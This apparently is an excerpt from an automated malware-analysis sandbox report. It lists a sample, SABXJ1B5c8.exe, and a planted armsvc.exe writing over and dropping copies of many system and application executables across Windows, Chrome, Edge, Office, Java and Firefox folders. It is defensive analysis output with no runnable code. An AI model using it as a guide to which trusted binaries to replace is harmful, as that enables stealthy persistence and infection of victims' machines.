Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\Install\{AB28DC01-2BE1-4DAE-B39D-56281F166EE0}\117.0.5938.149_117.0.5938.132_chrome_updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
